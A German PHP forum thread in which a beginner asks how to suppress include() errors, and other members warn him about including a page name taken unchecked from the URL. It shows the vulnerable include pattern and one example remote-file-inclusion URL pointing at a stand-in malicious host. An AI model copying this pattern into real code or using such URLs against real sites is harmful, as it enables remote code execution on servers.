Include fehler abfangen? - php.de

X

fadass

Dabei seit: 08.07.2005

Beiträge: 108
#1

Include fehler abfangen?

09.10.2005, 10:37

hi,

also kein problem mit script, das funzt 1A, wollte nur wissen wie man fehler von inclue() abfängt,
ich prbier es so:

PHP-Code:

<?php if (!@include $site.'.php') { echo "Fehler: Die Seite existiert [b]nicht[/b]! "; echo '[url="JavaScript:history.back();"]Zurück zur letzten Seite[/url]'; } ?>

es wird auch alles angezeigt, leider etwas zu viel,

Code:

Warning: Failed opening 'news.php' for inclusion (include_path='.;c:\php4\pear') in c:\foxserv\www\wc3\index.php on line 73 404 Fehler: Die Seite existiert nicht! Zurück zur letzten Seite

das

Code:

Fehler: Die Seite existiert nicht! Zurück zur letzten Seite

soll stehen bleiben, nur der rest net, könnt ihr mir helfen???

danke im voraus!

p.s: Diesmal kein doppelpost, versprochen!!
Stichworte: -
Buhmann

Dabei seit: 20.01.2005

Beiträge: 1557
#2

09.10.2005, 10:41

mach doch einfach

PHP-Code:

<?php if (!file_exists($site.'.php')) { echo "Fehler: Die Seite existiert [b]nicht[/b]! "; echo '[url="JavaScript:history.back();"]Zurück zur letzten Seite[/url]'; } else { include $site.'.php'; } ?>

[edit]

O.o, mein tausendster Post
Kommentar
#3

09.10.2005, 10:43

Ich will aber hoffen, dass $site nicht ungeprüft über die URL in das Script kommt, oder?

Gruß
phpfan
Kommentar
fadass

Dabei seit: 08.07.2005

Beiträge: 108
#4

09.10.2005, 12:59

@phpfan, ahhhhh doch is das schlimm?
Kommentar
#5

09.10.2005, 13:08

Dann überlege, was z.B. mit so einem Aufruf passiert:

index.php?site=index

Mir fallen da auch noch andere böse Sachen ein, die ich aber hier lieber nicht schreibe.

PHP-Code:

<? if (isset($_GET['site'])) { switch ($_GET['site']) { case 'news' : $include = "news.php"; break; case 'gbook': $include = "gbook.php"; break; default: $include = "home.php"; } } else $include = "home.php"; include ($include); ?>

Gruß
phpfan
Kommentar
fadass

Dabei seit: 08.07.2005

Beiträge: 108
#6

09.10.2005, 13:18

da wird doch nur ne variable über die url übergeben?? oder net? is doch nix schlimmes
Kommentar
ZiMD

Dabei seit: 11.08.2005

Beiträge: 206
#7

09.10.2005, 13:34

index.php?include=http://www.boeseseite.de/boesesscrip

und jetzt?
Kommentar
#8

09.10.2005, 13:37

Zitat von fadass

da wird doch nur ne variable über die url übergeben?? oder net? is doch nix schlimmes

Nochmal!!! Was passiert bei einem Aufruf der Datei index.php, wenn die URL manipuliert wird und so aussieht

index.php?site=index

und in der index.php ungeprüft das steht:

include $site.'.php';

Gruß
phpfan
Kommentar
fadass

Dabei seit: 08.07.2005

Beiträge: 108
#9

09.10.2005, 13:50

da wird die seite $site included hia der code

PHP-Code:

<?php if(!isset($site)) $site = "news"; $mysql_ok = strstr($site,":"); if($mysql_ok != FALSE) $site = "news"; include($site.".php"); if (!@include $site.'.php') { echo "Fehler: Die Seite existiert [b]nicht[/b]! "; echo '[url="JavaScript:history.back();"]Zurück zur letzten Seite[/url]'; } ?>
Kommentar
ZiMD

Dabei seit: 11.08.2005

Beiträge: 206
#10

09.10.2005, 13:53

hallo?

wenn ers so macht wie in meinem beispiel kann der einfach beliebigen code auf deinem server ausführen!!!!
Kommentar
#11

09.10.2005, 14:01

Zitat von fadass

da wird die seite $site included hia der code

Sag' mal, hast du das Mitdenken komplett abgeschaltet???

Nimm dieses kleine Script, speichere es als test.php ab und rufe es mit test.php?site=test auf:

PHP-Code:

<? echo $_SERVER['PHP_SELF'] . " "; include ($_GET['site'] . ".php"); ?>

Und das ist noch die harmloseste aller Varianten.

Gruß
phpfan
Kommentar
ZiMD

Dabei seit: 11.08.2005

Beiträge: 206
#12

09.10.2005, 14:06

und da normalerweise ein timeout eingestellt ist auch nicht besonders schlimm
Kommentar
fadass

Dabei seit: 08.07.2005

Beiträge: 108
#13

09.10.2005, 14:59

ach, pfui, egal wird sowiso net online gestellt, is eine intranet site, von daher isses mir egal
Kommentar
#14

09.10.2005, 15:47

Zitat von fadass

ach, pfui, egal wird sowiso net online gestellt, is eine intranet site, von daher isses mir egal

Na, das ist mal eine Begründung, um ein besch.... Script zu schreiben.

Gruß
phpfan
Kommentar
fadass

Dabei seit: 08.07.2005

Beiträge: 108
#15

09.10.2005, 22:45

jo, nagut ich sehs ein
ich wer ein anderes script schreiben, trotzdem danke für die warnung
Kommentar

Vorherige 1 2 Weiter

Lädt...

X